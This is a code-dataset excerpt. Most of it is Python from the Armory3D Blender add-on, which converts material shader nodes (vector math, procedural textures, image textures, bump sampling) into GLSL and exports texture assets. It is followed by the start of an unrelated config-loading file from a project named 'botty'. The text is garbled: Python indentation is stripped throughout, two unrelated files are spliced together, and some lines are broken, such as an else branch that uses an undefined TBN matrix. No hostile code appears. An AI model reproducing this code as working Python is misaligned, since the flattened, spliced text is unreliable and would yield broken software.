curshader.write('float {0}_fh1 = {0}_{1} - {0}_{2}; float {0}_fh2 = {0}_{3} - {0}_{4};'.format(sample_bump_res, ext[0], ext[1], ext[2], ext[3]))
curshader.write('{0}_fh1 *= ({1}) * 3.0; {0}_fh2 *= ({1}) * 3.0;'.format(sample_bump_res, strength))
curshader.write('vec3 {0}_a = normalize(vec3(2.0, 0.0, {0}_fh1));'.format(sample_bump_res))
curshader.write('vec3 {0}_b = normalize(vec3(0.0, 2.0, {0}_fh2));'.format(sample_bump_res))
res = 'normalize(mat3({0}_a, {0}_b, normalize(vec3({0}_fh1, {0}_fh2, 2.0))) * n)'.format(sample_bump_res)
sample_bump_res = ''
else:
res = 'n'
return res
elif node.type == 'MAPPING':
out = parse_vector_input(node.inputs[0])
scale = node.inputs['Scale'].default_value
rotation = node.inputs['Rotation'].default_value
location = node.inputs['Location'].default_value if node.inputs['Location'].enabled else [0.0, 0.0, 0.0]
if scale[0] != 1.0 or scale[1] != 1.0 or scale[2] != 1.0:
out = '({0} * vec3({1}, {2}, {3}))'.format(out, scale[0], scale[1], scale[2])
if rotation[2] != 0.0:
            # Only the Z axis of the ZYX rotation is handled for now
            # (full handling is left commented below)
a = rotation[2]
# x * cos(theta) - y * sin(theta)
# x * sin(theta) + y * cos(theta)
out = 'vec3({0}.x * {1} - ({0}.y) * {2}, {0}.x * {2} + ({0}.y) * {1}, 0.0)'.format(out, math.cos(a), math.sin(a))
# if node.rotation[1] != 0.0:
# a = node.rotation[1]
# out = 'vec3({0}.x * {1} - {0}.z * {2}, {0}.x * {2} + {0}.z * {1}, 0.0)'.format(out, math.cos(a), math.sin(a))
# if node.rotation[0] != 0.0:
# a = node.rotation[0]
# out = 'vec3({0}.y * {1} - {0}.z * {2}, {0}.y * {2} + {0}.z * {1}, 0.0)'.format(out, math.cos(a), math.sin(a))
if location[0] != 0.0 or location[1] != 0.0 or location[2] != 0.0:
out = '({0} + vec3({1}, {2}, {3}))'.format(out, location[0], location[1], location[2])
# use Extension parameter from the Texture node instead
# if node.use_min:
# out = 'max({0}, vec3({1}, {2}, {3}))'.format(out, node.min[0], node.min[1])
# if node.use_max:
# out = 'min({0}, vec3({1}, {2}, {3}))'.format(out, node.max[0], node.max[1])
return out
elif node.type == 'NORMAL':
if socket == node.outputs[0]:
return to_vec3(node.outputs[0].default_value)
elif socket == node.outputs[1]: # TODO: is parse_value path preferred?
nor = parse_vector_input(node.inputs[0])
return 'vec3(dot({0}, {1}))'.format(to_vec3(node.outputs[0].default_value), nor)
elif node.type == 'NORMAL_MAP':
if curshader == tese:
return parse_vector_input(node.inputs[1])
else:
#space = node.space
#map = node.uv_map
# Color
parse_normal_map_color_input(node.inputs[1], node.inputs[0])
return None
elif node.type == 'VECT_TRANSFORM':
#type = node.vector_type
#conv_from = node.convert_from
#conv_to = node.convert_to
        # Pass through
return parse_vector_input(node.inputs[0])
elif node.type == 'COMBXYZ':
x = parse_value_input(node.inputs[0])
y = parse_value_input(node.inputs[1])
z = parse_value_input(node.inputs[2])
return 'vec3({0}, {1}, {2})'.format(x, y, z)
elif node.type == 'VECT_MATH':
vec1 = parse_vector_input(node.inputs[0])
vec2 = parse_vector_input(node.inputs[1])
op = node.operation
if op == 'ADD':
return '({0} + {1})'.format(vec1, vec2)
elif op == 'SUBTRACT':
return '({0} - {1})'.format(vec1, vec2)
elif op == 'AVERAGE':
return '(({0} + {1}) / 2.0)'.format(vec1, vec2)
elif op == 'DOT_PRODUCT':
return 'vec3(dot({0}, {1}))'.format(vec1, vec2)
elif op == 'CROSS_PRODUCT':
return 'cross({0}, {1})'.format(vec1, vec2)
elif op == 'NORMALIZE':
return 'normalize({0})'.format(vec1)
elif node.type == 'DISPLACEMENT':
height = parse_value_input(node.inputs[0])
midlevel = parse_value_input(node.inputs[1])
scale = parse_value_input(node.inputs[2])
nor = parse_vector_input(node.inputs[3])
return '(vec3({0}) * {1})'.format(height, scale)
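        # Note: midlevel and nor are parsed above but unused in the returned
        # expression -- the node is approximated as a scalar height * scale,
        # presumably applied along the vertex normal later in the pipeline.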
def parse_normal_map_color_input(inp, strength_input=None):
global normal_parsed
global frag
if basecol_only:
return
if inp.is_linked == False:
return
if normal_parsed:
return
normal_parsed = True
frag.write_normal += 1
if not get_arm_export_tangents() or mat_get_material().arm_decal: # Compute TBN matrix
frag.write('vec3 texn = ({0}) * 2.0 - 1.0;'.format(parse_vector_input(inp)))
frag.write('texn.y = -texn.y;')
frag.add_include('std/normals.glsl')
frag.write('mat3 TBN = cotangentFrame(n, -vVec, texCoord);')
frag.write('n = TBN * normalize(texn);')
else:
frag.write('vec3 n = ({0}) * 2.0 - 1.0;'.format(parse_vector_input(inp)))
if strength_input != None:
strength = parse_value_input(strength_input)
if strength != '1.0':
frag.write('n.xy *= {0};'.format(strength))
frag.write('n = normalize(TBN * n);')
con.add_elem('tang', 'short4norm')
frag.write_normal -= 1
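# Illustrative fragment output of the TBN branch above (uv/tex abbreviated):
#   vec3 texn = texture(tex, uv).rgb * 2.0 - 1.0;
#   texn.y = -texn.y;
#   mat3 TBN = cotangentFrame(n, -vVec, texCoord);
#   n = TBN * normalize(texn);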
def parse_value_input(inp):
if inp.is_linked:
l = inp.links[0]
if l.from_node.type == 'REROUTE':
return parse_value_input(l.from_node.inputs[0])
res_var = write_result(l)
st = l.from_socket.type
if st == 'RGB' or st == 'RGBA' or st == 'VECTOR':
return '{0}.x'.format(res_var)
else: # VALUE
return res_var
else:
if mat_batch() and inp.is_uniform:
return to_uniform(inp)
else:
return to_vec1(inp.default_value)
def parse_value(node, socket):
global particle_info
global sample_bump
if node.type == 'GROUP':
if node.node_tree.name.startswith('Armory PBR'):
# Displacement
if socket == node.outputs[1]:
return parse_value_input(node.inputs[7])
else:
return None
else:
return parse_group(node, socket)
elif node.type == 'GROUP_INPUT':
return parse_group_input(node, socket)
elif node.type == 'ATTRIBUTE':
# Pass time till drivers are implemented
if node.attribute_name == 'time':
curshader.add_uniform('float time', link='_time')
return 'time'
else:
return '0.0'
elif node.type == 'CAMERA':
# View Z Depth
if socket == node.outputs[1]:
curshader.add_include('std/math.glsl')
curshader.add_uniform('vec2 cameraProj', link='_cameraPlaneProj')
return 'linearize(gl_FragCoord.z, cameraProj)'
# View Distance
else:
curshader.add_uniform('vec3 eye', link='_cameraPosition')
return 'distance(eye, wposition)'
elif node.type == 'FRESNEL':
curshader.add_function(c_functions.str_fresnel)
ior = parse_value_input(node.inputs[0])
if node.inputs[1].is_linked:
dotnv = 'dot({0}, vVec)'.format(parse_vector_input(node.inputs[1]))
else:
dotnv = 'dotNV'
return 'fresnel({0}, {1})'.format(ior, dotnv)
elif node.type == 'NEW_GEOMETRY':
if socket == node.outputs[6]: # Backfacing
return '(1.0 - float(gl_FrontFacing))'
elif socket == node.outputs[7]: # Pointiness
return '0.0'
elif node.type == 'HAIR_INFO':
# Is Strand
# Intercept
# Thickness
return '0.5'
elif node.type == 'LAYER_WEIGHT':
blend = parse_value_input(node.inputs[0])
if node.inputs[1].is_linked:
dotnv = 'dot({0}, vVec)'.format(parse_vector_input(node.inputs[1]))
else:
dotnv = 'dotNV'
if socket == node.outputs[0]: # Fresnel
curshader.add_function(c_functions.str_fresnel)
return 'fresnel(1.0 / (1.0 - {0}), {1})'.format(blend, dotnv)
elif socket == node.outputs[1]: # Facing
return '(1.0 - pow({0}, ({1} < 0.5) ? 2.0 * {1} : 0.5 / (1.0 - {1})))'.format(dotnv, blend)
elif node.type == 'LIGHT_PATH':
if socket == node.outputs[0]: # Is Camera Ray
return '1.0'
elif socket == node.outputs[1]: # Is Shadow Ray
return '0.0'
elif socket == node.outputs[2]: # Is Diffuse Ray
return '1.0'
elif socket == node.outputs[3]: # Is Glossy Ray
return '1.0'
elif socket == node.outputs[4]: # Is Singular Ray
return '0.0'
elif socket == node.outputs[5]: # Is Reflection Ray
return '0.0'
elif socket == node.outputs[6]: # Is Transmission Ray
return '0.0'
elif socket == node.outputs[7]: # Ray Length
return '0.0'
elif socket == node.outputs[8]: # Ray Depth
return '0.0'
elif socket == node.outputs[9]: # Transparent Depth
return '0.0'
elif socket == node.outputs[10]: # Transmission Depth
return '0.0'
elif node.type == 'OBJECT_INFO':
if socket == node.outputs[2]: # Object Index
curshader.add_uniform('float objectInfoIndex', link='_objectInfoIndex')
return 'objectInfoIndex'
elif socket == node.outputs[3]: # Material Index
curshader.add_uniform('float objectInfoMaterialIndex', link='_objectInfoMaterialIndex')
return 'objectInfoMaterialIndex'
elif socket == node.outputs[4]: # Random
curshader.add_uniform('float objectInfoRandom', link='_objectInfoRandom')
return 'objectInfoRandom'
elif node.type == 'PARTICLE_INFO':
if socket == node.outputs[0]: # Index
particle_info['index'] = True
return 'p_index' if arm.utils.get_rp().arm_particles == 'On' else '0.0'
elif socket == node.outputs[1]: # Age
particle_info['age'] = True
return 'p_age' if arm.utils.get_rp().arm_particles == 'On' else '0.0'
elif socket == node.outputs[2]: # Lifetime
particle_info['lifetime'] = True
return 'p_lifetime' if arm.utils.get_rp().arm_particles == 'On' else '0.0'
elif socket == node.outputs[4]: # Size
particle_info['size'] = True
return '1.0'
elif node.type == 'VALUE':
if node.arm_material_param:
nn = 'param_' + node_name(node.name)
curshader.add_uniform('float {0}'.format(nn), link='{0}'.format(node.name))
return nn
else:
return to_vec1(node.outputs[0].default_value)
elif node.type == 'WIREFRAME':
#node.use_pixel_size
# size = parse_value_input(node.inputs[0])
return '0.0'
elif node.type == 'TEX_BRICK':
curshader.add_function(c_functions.str_tex_brick)
if node.inputs[0].is_linked:
co = parse_vector_input(node.inputs[0])
else:
co = 'bposition'
scale = parse_value_input(node.inputs[4])
res = 'tex_brick_f({0} * {1})'.format(co, scale)
if sample_bump:
write_bump(node, res)
return res
elif node.type == 'TEX_CHECKER':
curshader.add_function(c_functions.str_tex_checker)
if node.inputs[0].is_linked:
co = parse_vector_input(node.inputs[0])
else:
co = 'bposition'
scale = parse_value_input(node.inputs[3])
res = 'tex_checker_f({0}, {1})'.format(co, scale)
if sample_bump:
write_bump(node, res)
return res
elif node.type == 'TEX_GRADIENT':
if node.inputs[0].is_linked:
co = parse_vector_input(node.inputs[0])
else:
co = 'bposition'
grad = node.gradient_type
if grad == 'LINEAR':
f = '{0}.x'.format(co)
elif grad == 'QUADRATIC':
f = '0.0'
elif grad == 'EASING':
f = '0.0'
elif grad == 'DIAGONAL':
f = '({0}.x + {0}.y) * 0.5'.format(co)
elif grad == 'RADIAL':
f = 'atan({0}.y, {0}.x) / PI2 + 0.5'.format(co)
elif grad == 'QUADRATIC_SPHERE':
f = '0.0'
elif grad == 'SPHERICAL':
f = 'max(1.0 - sqrt({0}.x * {0}.x + {0}.y * {0}.y + {0}.z * {0}.z), 0.0)'.format(co)
res = '(clamp({0}, 0.0, 1.0))'.format(f)
if sample_bump:
write_bump(node, res)
return res
elif node.type == 'TEX_IMAGE':
# Already fetched
if is_parsed(store_var_name(node)):
return '{0}.a'.format(store_var_name(node))
tex_name = safesrc(node.name)
tex = make_texture(node, tex_name)
tex_link = node.name if node.arm_material_param else None
if tex != None:
curshader.write_textures += 1
res = '{0}.a'.format(texture_store(node, tex, tex_name, tex_link=tex_link))
curshader.write_textures -= 1
return res
elif node.image == None: # Empty texture
tex = {}
tex['name'] = tex_name
tex['file'] = ''
return '{0}.a'.format(texture_store(node, tex, tex_name, True, tex_link=tex_link))
else:
tex_store = store_var_name(node) # Pink color for missing texture
curshader.write('vec4 {0} = vec4(1.0, 0.0, 1.0, 1.0);'.format(tex_store))
return '{0}.a'.format(tex_store)
elif node.type == 'TEX_MAGIC':
curshader.add_function(c_functions.str_tex_magic)
if node.inputs[0].is_linked:
co = parse_vector_input(node.inputs[0])
else:
co = 'bposition'
scale = parse_value_input(node.inputs[1])
res = 'tex_magic_f({0} * {1} * 4.0)'.format(co, scale)
if sample_bump:
write_bump(node, res, 0.1)
return res
elif node.type == 'TEX_MUSGRAVE':
# Fall back to noise
curshader.add_function(c_functions.str_tex_musgrave)
if node.inputs[0].is_linked:
co = parse_vector_input(node.inputs[0])
else:
co = 'bposition'
scale = parse_value_input(node.inputs[1])
# detail = parse_value_input(node.inputs[2])
# distortion = parse_value_input(node.inputs[3])
res = 'tex_musgrave_f({0} * {1} * 0.5)'.format(co, scale)
if sample_bump:
write_bump(node, res)
return res
elif node.type == 'TEX_NOISE':
curshader.add_function(c_functions.str_tex_noise)
assets_add(get_sdk_path() + '/armory/Assets/' + 'noise256.png')
assets_add_embedded_data('noise256.png')
curshader.add_uniform('sampler2D snoise256', link='$noise256.png')
if node.inputs[0].is_linked:
co = parse_vector_input(node.inputs[0])
else:
co = 'bposition'
scale = parse_value_input(node.inputs[1])
# detail = parse_value_input(node.inputs[2])
# distortion = parse_value_input(node.inputs[3])
res = 'tex_noise({0} * {1})'.format(co, scale)
if sample_bump:
write_bump(node, res, 0.1)
return res
elif node.type == 'TEX_POINTDENSITY':
return '0.0'
elif node.type == 'TEX_VORONOI':
curshader.add_function(c_functions.str_tex_voronoi)
assets_add(get_sdk_path() + '/armory/Assets/' + 'noise256.png')
assets_add_embedded_data('noise256.png')
curshader.add_uniform('sampler2D snoise256', link='$noise256.png')
if node.inputs[0].is_linked:
co = parse_vector_input(node.inputs[0])
else:
co = 'bposition'
scale = parse_value_input(node.inputs[1])
if node.coloring == 'INTENSITY':
res = 'tex_voronoi({0} * {1}).a'.format(co, scale)
else: # CELLS
res = 'tex_voronoi({0} * {1}).r'.format(co, scale)
if sample_bump:
write_bump(node, res)
return res
elif node.type == 'TEX_WAVE':
curshader.add_function(c_functions.str_tex_wave)
if node.inputs[0].is_linked:
co = parse_vector_input(node.inputs[0])
else:
co = 'bposition'
scale = parse_value_input(node.inputs[1])
res = 'tex_wave_f({0} * {1})'.format(co, scale)
if sample_bump:
write_bump(node, res)
return res
elif node.type == 'LIGHT_FALLOFF':
# Constant, linear, quadratic
# Shaders default to quadratic for now
return '1.0'
elif node.type == 'NORMAL':
nor = parse_vector_input(node.inputs[0])
return 'dot({0}, {1})'.format(to_vec3(node.outputs[0].default_value), nor)
elif node.type == 'VALTORGB': # ColorRamp
return '1.0'
elif node.type == 'MATH':
val1 = parse_value_input(node.inputs[0])
val2 = parse_value_input(node.inputs[1])
op = node.operation
if op == 'ADD':
out_val = '({0} + {1})'.format(val1, val2)
elif op == 'SUBTRACT':
out_val = '({0} - {1})'.format(val1, val2)
elif op == 'MULTIPLY':
out_val = '({0} * {1})'.format(val1, val2)
elif op == 'DIVIDE':
out_val = '({0} / {1})'.format(val1, val2)
elif op == 'POWER':
out_val = 'pow({0}, {1})'.format(val1, val2)
elif op == 'LOGARITHM':
out_val = 'log({0})'.format(val1)
elif op == 'SQRT':
out_val = 'sqrt({0})'.format(val1)
elif op == 'ABSOLUTE':
out_val = 'abs({0})'.format(val1)
elif op == 'MINIMUM':
out_val = 'min({0}, {1})'.format(val1, val2)
elif op == 'MAXIMUM':
out_val = 'max({0}, {1})'.format(val1, val2)
elif op == 'LESS_THAN':
out_val = 'float({0} < {1})'.format(val1, val2)
elif op == 'GREATER_THAN':
out_val = 'float({0} > {1})'.format(val1, val2)
elif op == 'ROUND':
# out_val = 'round({0})'.format(val1)
out_val = 'floor({0} + 0.5)'.format(val1)
elif op == 'FLOOR':
out_val = 'floor({0})'.format(val1)
elif op == 'CEIL':
out_val = 'ceil({0})'.format(val1)
elif op == 'FRACT':
out_val = 'fract({0})'.format(val1)
elif op == 'MODULO':
# out_val = 'float({0} % {1})'.format(val1, val2)
out_val = 'mod({0}, {1})'.format(val1, val2)
elif op == 'SINE':
out_val = 'sin({0})'.format(val1)
elif op == 'COSINE':
out_val = 'cos({0})'.format(val1)
elif op == 'TANGENT':
out_val = 'tan({0})'.format(val1)
elif op == 'ARCSINE':
out_val = 'asin({0})'.format(val1)
elif op == 'ARCCOSINE':
out_val = 'acos({0})'.format(val1)
elif op == 'ARCTANGENT':
out_val = 'atan({0})'.format(val1)
elif op == 'ARCTAN2':
out_val = 'atan({0}, {1})'.format(val1, val2)
if node.use_clamp:
return 'clamp({0}, 0.0, 1.0)'.format(out_val)
else:
return out_val
elif node.type == 'RGBTOBW':
col = parse_vector_input(node.inputs[0])
return '((({0}.r * 0.3 + {0}.g * 0.59 + {0}.b * 0.11) / 3.0) * 2.5)'.format(col)
elif node.type == 'SEPHSV':
return '0.0'
elif node.type == 'SEPRGB':
col = parse_vector_input(node.inputs[0])
if socket == node.outputs[0]:
return '{0}.r'.format(col)
elif socket == node.outputs[1]:
return '{0}.g'.format(col)
elif socket == node.outputs[2]:
return '{0}.b'.format(col)
elif node.type == 'SEPXYZ':
vec = parse_vector_input(node.inputs[0])
if socket == node.outputs[0]:
return '{0}.x'.format(vec)
elif socket == node.outputs[1]:
return '{0}.y'.format(vec)
elif socket == node.outputs[2]:
return '{0}.z'.format(vec)
elif node.type == 'VECT_MATH':
vec1 = parse_vector_input(node.inputs[0])
vec2 = parse_vector_input(node.inputs[1])
op = node.operation
if op == 'DOT_PRODUCT':
return 'dot({0}, {1})'.format(vec1, vec2)
else:
return '0.0'
##
def vector_curve(name, fac, points):
# Write Ys array
ys_var = name + '_ys'
curshader.write('float {0}[{1}];'.format(ys_var, len(points))) # TODO: Make const
for i in range(0, len(points)):
curshader.write('{0}[{1}] = {2};'.format(ys_var, i, points[i].location[1]))
# Get index
fac_var = name + '_fac'
curshader.write('float {0} = {1};'.format(fac_var, fac))
index = '0'
for i in range(1, len(points)):
index += ' + ({0} > {1} ? 1 : 0)'.format(fac_var, points[i].location[0])
# Write index
index_var = name + '_i'
curshader.write('int {0} = {1};'.format(index_var, index))
# Linear
# Write Xs array
facs_var = name + '_xs'
curshader.write('float {0}[{1}];'.format(facs_var, len(points))) # TODO: Make const
for i in range(0, len(points)):
curshader.write('{0}[{1}] = {2};'.format(facs_var, i, points[i].location[0]))
# Map vector
return 'mix({0}[{1}], {0}[{1} + 1], ({2} - {3}[{1}]) * (1.0 / ({3}[{1} + 1] - {3}[{1}]) ))'.format(ys_var, index_var, fac_var, facs_var)
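# vector_curve() emits a piecewise-linear evaluation of a Blender curve: the
# xs/ys arrays hold the control points, the index is picked with the same
# branchless comparison-sum used for ColorRamp, and the final mix() performs
# the linear interpolation. Bezier handle types are ignored, so curves are
# approximated by straight segments.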
def write_normal(inp):
if inp.is_linked and inp.links[0].from_node.type != 'GROUP_INPUT':
normal_res = parse_vector_input(inp)
if normal_res != None:
curshader.write('n = {0};'.format(normal_res))
def is_parsed(s):
global parsed
return s in parsed
def res_var_name(node, socket):
return node_name(node.name) + '_' + safesrc(socket.name) + '_res'
def write_result(l):
global parsed
res_var = res_var_name(l.from_node, l.from_socket)
# Unparsed node
if not is_parsed(res_var):
parsed[res_var] = True
st = l.from_socket.type
if st == 'RGB' or st == 'RGBA' or st == 'VECTOR':
res = parse_vector(l.from_node, l.from_socket)
if res == None:
return None
curshader.write('vec3 {0} = {1};'.format(res_var, res))
elif st == 'VALUE':
res = parse_value(l.from_node, l.from_socket)
if res == None:
return None
curshader.write('float {0} = {1};'.format(res_var, res))
# Normal map already parsed, return
elif l.from_node.type == 'NORMAL_MAP':
return None
return res_var
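# write_result() memoizes on the result variable name: a socket feeding
# several inputs is emitted once, and later references reuse the cached GLSL
# variable, so the generated shader contains no duplicated node subtrees.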
def glsl_type(t):
if t == 'RGB' or t == 'RGBA' or t == 'VECTOR':
return 'vec3'
else:
return 'float'
def to_uniform(inp):
uname = safesrc(inp.node.name) + safesrc(inp.name)
curshader.add_uniform(glsl_type(inp.type) + ' ' + uname)
return uname
def store_var_name(node):
return node_name(node.name) + '_store'
def texture_store(node, tex, tex_name, to_linear=False, tex_link=None):
global sample_bump
global sample_bump_res
global parsed
tex_store = store_var_name(node)
if is_parsed(tex_store):
return tex_store
parsed[tex_store] = True
mat_bind_texture(tex)
con.add_elem('tex', 'short2norm')
curshader.add_uniform('sampler2D {0}'.format(tex_name), link=tex_link)
if node.inputs[0].is_linked:
uv_name = parse_vector_input(node.inputs[0])
uv_name = 'vec2({0}.x, 1.0 - {0}.y)'.format(uv_name)
else:
uv_name = 'texCoord'
triplanar = node.projection == 'BOX'
if triplanar:
curshader.write(f'vec3 texCoordBlend = vec3(0.0); vec2 {uv_name}1 = vec2(0.0); vec2 {uv_name}2 = vec2(0.0);') # Temp
curshader.write(f'vec4 {tex_store} = vec4(0.0, 0.0, 0.0, 0.0);')
curshader.write(f'if (texCoordBlend.x > 0) {tex_store} += texture({tex_name}, {uv_name}.xy) * texCoordBlend.x;')
curshader.write(f'if (texCoordBlend.y > 0) {tex_store} += texture({tex_name}, {uv_name}1.xy) * texCoordBlend.y;')
curshader.write(f'if (texCoordBlend.z > 0) {tex_store} += texture({tex_name}, {uv_name}2.xy) * texCoordBlend.z;')
else:
if mat_texture_grad():
curshader.write('vec4 {0} = textureGrad({1}, {2}.xy, g2.xy, g2.zw);'.format(tex_store, tex_name, uv_name))
else:
curshader.write('vec4 {0} = texture({1}, {2}.xy);'.format(tex_store, tex_name, uv_name))
if sample_bump:
sample_bump_res = tex_store
curshader.write('float {0}_1 = textureOffset({1}, {2}.xy, ivec2(-2, 0)).r;'.format(tex_store, tex_name, uv_name))
curshader.write('float {0}_2 = textureOffset({1}, {2}.xy, ivec2(2, 0)).r;'.format(tex_store, tex_name, uv_name))
curshader.write('float {0}_3 = textureOffset({1}, {2}.xy, ivec2(0, -2)).r;'.format(tex_store, tex_name, uv_name))
curshader.write('float {0}_4 = textureOffset({1}, {2}.xy, ivec2(0, 2)).r;'.format(tex_store, tex_name, uv_name))
sample_bump = False
if to_linear:
curshader.write('{0}.rgb = pow({0}.rgb, vec3(2.2));'.format(tex_store))
return tex_store
def write_bump(node, res, scl=0.001):
global sample_bump
global sample_bump_res
sample_bump_res = store_var_name(node) + '_bump'
# Testing.. get function parts..
ar = res.split('(', 1)
pre = ar[0] + '('
if ',' in ar[1]:
ar2 = ar[1].split(',', 1)
co = ar2[0]
post = ',' + ar2[1]
else:
co = ar[1][:-1]
post = ')'
curshader.write('float {0}_1 = {1}{2} + vec3(-{4}, 0.0, 0.0){3};'.format(sample_bump_res, pre, co, post, scl))
curshader.write('float {0}_2 = {1}{2} + vec3({4}, 0.0, {4}){3};'.format(sample_bump_res, pre, co, post, scl))
curshader.write('float {0}_3 = {1}{2} + vec3(0.0, -{4}, 0.0){3};'.format(sample_bump_res, pre, co, post, scl))
curshader.write('float {0}_4 = {1}{2} + vec3(0.0, {4}, -{4}){3};'.format(sample_bump_res, pre, co, post, scl))
sample_bump = False
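# write_bump() approximates the height gradient of a procedural texture by
# re-evaluating its expression at four small coordinate offsets (the
# *_1..*_4 samples); texture_store() does the equivalent for image textures
# via textureOffset(). The BUMP branch of parse_vector() then combines the
# samples into a perturbed normal using finite differences.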
def to_vec1(v):
return str(v)
def to_vec3(v):
return 'vec3({0}, {1}, {2})'.format(v[0], v[1], v[2])
def node_by_type(nodes, ntype):
for n in nodes:
if n.type == ntype:
return n
def socket_index(node, socket):
for i in range(0, len(node.outputs)):
if node.outputs[i] == socket:
return i
def node_name(s):
for p in parents:
s = p.name + '_' + s
if curshader.write_textures > 0:
s += '_texread'
s = safesrc(s)
if '__' in s: # Consecutive _ are reserved
s = s.replace('_', '_x')
return s
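# Illustrative: node names are prefixed with their group parents and made
# identifier-safe, so a node "Mix" inside group "Wood" might become
# "Wood_Mix", while consecutive underscores are escaped to "_x" because
# they are reserved.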
##
def make_texture(image_node, tex_name, matname=None):
tex = {}
tex['name'] = tex_name
image = image_node.image
if matname is None:
matname = mat_state.material.name
if image is None:
return None
# Get filepath
filepath = image.filepath
if filepath == '':
if image.packed_file is not None:
filepath = './' + image.name
has_ext = filepath.endswith(('.jpg', '.png', '.hdr'))
if not has_ext:
# Raw bytes, write converted .jpg to /unpacked
filepath += '.raw'
elif image.source == "GENERATED":
unpack_path = os.path.join(arm.utils.get_fp_build(), 'compiled', 'Assets', 'unpacked')
if not os.path.exists(unpack_path):
os.makedirs(unpack_path)
filepath = os.path.join(unpack_path, image.name + ".jpg")
arm.utils.convert_image(image, filepath, "JPEG")
else:
arm.log.warn(matname + '/' + image.name + ' - invalid file path')
return None
# Reference image name
texpath = arm.utils.asset_path(filepath)
texfile = arm.utils.extract_filename(filepath)
tex['file'] = arm.utils.safestr(texfile)
s = tex['file'].rsplit('.', 1)
if len(s) == 1:
arm.log.warn(matname + '/' + image.name + ' - file extension required for image name')
return None
ext = s[1].lower()
do_convert = ext not in ('jpg', 'png', 'hdr', 'mp4') # Convert image
if do_convert:
new_ext = 'png' if (ext in ('tga', 'dds')) else 'jpg'
tex['file'] = tex['file'].rsplit('.', 1)[0] + '.' + new_ext
if image.packed_file is not None or not is_ascii(texfile):
# Extract packed data / copy non-ascii texture
unpack_path = os.path.join(arm.utils.get_fp_build(), 'compiled', 'Assets', 'unpacked')
if not os.path.exists(unpack_path):
os.makedirs(unpack_path)
unpack_filepath = os.path.join(unpack_path, tex['file'])
if do_convert:
if not os.path.isfile(unpack_filepath):
fmt = 'PNG' if new_ext == 'png' else 'JPEG'
arm.utils.convert_image(image, unpack_filepath, file_format=fmt)
else:
# Write bytes if size is different or file does not exist yet
if image.packed_file is not None:
if not os.path.isfile(unpack_filepath) or os.path.getsize(unpack_filepath) != image.packed_file.size:
with open(unpack_filepath, 'wb') as f:
f.write(image.packed_file.data)
# Copy non-ascii texture
else:
if not os.path.isfile(unpack_filepath) or os.path.getsize(unpack_filepath) != os.path.getsize(texpath):
shutil.copy(texpath, unpack_filepath)
arm.assets.add(unpack_filepath)
else:
if not os.path.isfile(arm.utils.asset_path(filepath)):
arm.log.warn('Material ' + matname + '/' + image.name + ' - file not found(' + filepath + ')')
return None
if do_convert:
unpack_path = os.path.join(arm.utils.get_fp_build(), 'compiled', 'Assets', 'unpacked')
if not os.path.exists(unpack_path):
os.makedirs(unpack_path)
converted_path = os.path.join(unpack_path, tex['file'])
# TODO: delete cache when file changes
if not os.path.isfile(converted_path):
fmt = 'PNG' if new_ext == 'png' else 'JPEG'
arm.utils.convert_image(image, converted_path, file_format=fmt)
arm.assets.add(converted_path)
else:
# Link image path to assets
# TODO: Khamake converts .PNG to .jpg? Convert ext to lowercase on windows
if arm.utils.get_os() == 'win':
s = filepath.rsplit('.', 1)
arm.assets.add(arm.utils.asset_path(s[0] + '.' + s[1].lower()))
else:
arm.assets.add(arm.utils.asset_path(filepath))
# if image_format != 'RGBA32':
# tex['format'] = image_format
interpolation = image_node.interpolation
rpdat = arm.utils.get_rp()
texfilter = rpdat.arm_texture_filter
if texfilter == 'Anisotropic':
interpolation = 'Smart'
elif texfilter == 'Linear':
interpolation = 'Linear'
elif texfilter == 'Point':
interpolation = 'Closest'
# TODO: Blender seems to load full images on size request, cache size instead
powimage = is_pow(image.size[0]) and is_pow(image.size[1])
if interpolation == 'Cubic': # Mipmap linear
tex['mipmap_filter'] = 'linear'
tex['generate_mipmaps'] = True
elif interpolation == 'Smart': # Mipmap anisotropic
tex['min_filter'] = 'anisotropic'
tex['mipmap_filter'] = 'linear'
tex['generate_mipmaps'] = True
elif interpolation == 'Closest':
tex['min_filter'] = 'point'
tex['mag_filter'] = 'point'
# else defaults to linear
if image_node.extension != 'REPEAT': # Extend or clip
tex['u_addressing'] = 'clamp'
tex['v_addressing'] = 'clamp'
if image.source == 'MOVIE':
tex['source'] = 'movie'
tex['min_filter'] = 'linear'
tex['mag_filter'] = 'linear'
tex['mipmap_filter'] = 'no'
tex['generate_mipmaps'] = False
return tex
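# Illustrative result for a packed power-of-two PNG sampled with 'Smart'
# interpolation (actual keys depend on the branches taken above):
#   {'name': 'Image_tex', 'file': 'wood.png', 'min_filter': 'anisotropic',
#    'mipmap_filter': 'linear', 'generate_mipmaps': True}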
def is_pow(num):
return ((num & (num - 1)) == 0) and num != 0
def is_ascii(s):
return len(s) == len(s.encode())
##
def get_rp_renderer():
return arm.utils.get_rp().rp_renderer
def get_arm_export_tangents():
return bpy.data.worlds['Arm'].arm_export_tangents
def safesrc(name):
return arm.utils.safesrc(name)
def get_sdk_path():
return arm.utils.get_sdk_path()
def disp_enabled():
return arm.utils.disp_enabled(arm.make_state.target)
def warn(text):
arm.log.warn(text)
def assets_add(path):
arm.assets.add(path)
def assets_add_embedded_data(path):
arm.assets.add_embedded_data(path)
def mat_name():
return mat_state.material.name
def mat_batch():
return mat_state.batch
def mat_bind_texture(tex):
mat_state.bind_textures.append(tex)
def mat_texture_grad():
return mat_state.texture_grad
def mat_get_material():
return mat_state.material
def mat_get_material_users():
return mat_state.mat_users
# --- per-file quality-signal columns omitted ---
# --- next record: src/config.py (Jizanator/botty @ 3026de0d4c03f4e797ed92dedb8fdfdf9cf1462e, MIT, 9,981 bytes, hexsha 4c4ffee559cb6b71ce9c01f453a956254f1cdb8a) ---
import configparser
import numpy as np
import os
class Config:
def _select_val(self, section: str, key: str = None):
if section in self._custom and key in self._custom[section]:
return self._custom[section][key]
elif section in self._config:
return self._config[section][key]
elif section in self._pickit_config:
return self._pickit_config[section][key]
elif section in self._shop_config:
return self._shop_config[section][key]
else:
return self._game_config[section][key]
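    # Lookup precedence: config/custom.ini overrides params.ini, which is
    # consulted before pickit.ini, shop.ini and finally game.ini.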
def __init__(self, print_warnings: bool = False):
        # print_warnings is a hack: a single Config instance is not passed
        # through the codebase, so each instance decides whether to emit warnings
self._print_warnings = print_warnings
self._config = configparser.ConfigParser()
self._config.read('config/params.ini')
self._game_config = configparser.ConfigParser()
self._game_config.read('config/game.ini')
self._pickit_config = configparser.ConfigParser()
self._pickit_config.read('config/pickit.ini')
self._shop_config = configparser.ConfigParser()
self._shop_config.read('config/shop.ini')
self._custom = configparser.ConfigParser()
